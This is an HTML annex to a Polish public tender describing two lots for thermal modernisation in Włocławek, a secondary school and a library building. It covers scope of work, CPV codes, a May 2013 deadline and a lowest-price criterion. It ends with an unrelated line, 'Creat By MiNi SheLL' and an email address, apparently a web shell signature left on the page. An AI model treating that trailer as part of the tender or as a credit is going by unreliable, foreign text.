<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I - Termomodernizacja budynku II Liceum Ogólnokształcącego im. Mikołaja Kopernika, ul. Urocza 3 we Włocławku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE I   -   budynek II Liceum Ogólnokształcącego im. M. Kopernika:
Budynek szkolny z dwiema salami gimnastycznymi wraz z zapleczem socjalnym. Budynek główny trzykondygnacyjny, całkowicie podpiwniczony połączony z halami sportowymi przez dwa łączniki jednokondygnacyjne, jeden z łączników jest podpiwniczony.

Ogólny zakres prac budowlanych:
- termoizolacja budynku,  tj. docieplenie ścian zewnętrznych wraz z podpiwniczeniem, wymiana starych okien na okna o U<= 1,5 wraz z nawiewnikami wraz z  niezbędnymi przebudowaniami otworów okiennych, wymiana drzwi zewnętrznych na szczelne,  ocieplenie stropodachów,
- remont wewnętrznej instalacji  c.o. w zakresie wyposażenia instalacji w zawory grzejnikowe z głowicami termostatycznymi, wymiana zaworów odcinających na podejściach pod piony oraz chemiczne płukanie instalacji, wymiana grzejników rurowo-żebrowych w dużej Sali gimnastycznej,  
- remont instalacji elektrycznej wewnętrznej i oświetlenia zewnętrznego w zakresie opisanym w PFU,
- wykonanie nowej instalacji odgromowej na budynku małej sali gimnastycznej z łącznikiem 
i dostosowanie istniejącej do nowych warunków po dociepleniu ścian na budynku głównym i dużej sali gimnastycznej,
-  ukrycia dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy jako element prac dociepleniowych - 4 szt,
- elewacja-kolorystyka,
- roboty odtworzeniowe po wykopach związanych z dociepleniem piwnic (utwardzenie terenu, odwodnienie terenu, rynny i opaski betonowe zieleń),
- Montaż  6 szt. ukryć dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy jako element prac dociepleniowych na budynku Zespołu Szkół Elektrycznych, ul, Toruńska 77/83 we Włocławku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.32.10.00-3, 45.33.11.00-7, 45.31.12.00-2, 71.22.10.00-3, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II -Termomodernizacja budynku Miejskiej Biblioteki Publicznej  i Włocławskiej Informacji -Turystycznej, ul. Warszawska 11/13 we Włocławku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE II  -  budynek Miejskiej Biblioteki Publicznej i Włocławskiej Informacji Turystycznej:
Budynek wolnostojący w zabudowie ulicznej, rozproszonej, dwupiętrowy, całkowicie podpiwniczony. Budynek jest w konstrukcji szkieletowej, ramowej. 

Ogólny zakres  robót budowlanych:
- termoizolacja budynku,  tj. docieplenie ścian zewnętrznych, częściowe zamurowanie okien w piwnicy wraz z przebudową studzienek okiennych - okna o U<= 1,5 wraz znawiewnikami,  wymiana drzwi zewnętrznych na szczelne,  ocieplenie stropodachów oraz  tarasu na 
I piętrze,
- remont wewnętrznej instalacji  c.o. w zakresie wyposażenia instalacji w zawory grzejnikowe z głowicami termostatycznymi, wymiana zaworów odcinających na podejściach pod piony oraz chemiczne płukanie instalacji,  
- remont instalacji elektrycznej oświetlenia zewnętrznego z montażem opraw energooszczędnych - ledowych,
- wykonanie nowej instalacji odgromowej,  
- montowanie ukryć dla ptaków i nietoperzy zgodnie ze standardami montowania ukryć dla ptaków i nietoperzy, jako element prac dociepleniowych  -  2 szt.,
- elewacja-kolorystyka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.32.10.00-3, 45.33.11.00-7, 45.31.12.00-2, 71.22.10.00-3, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com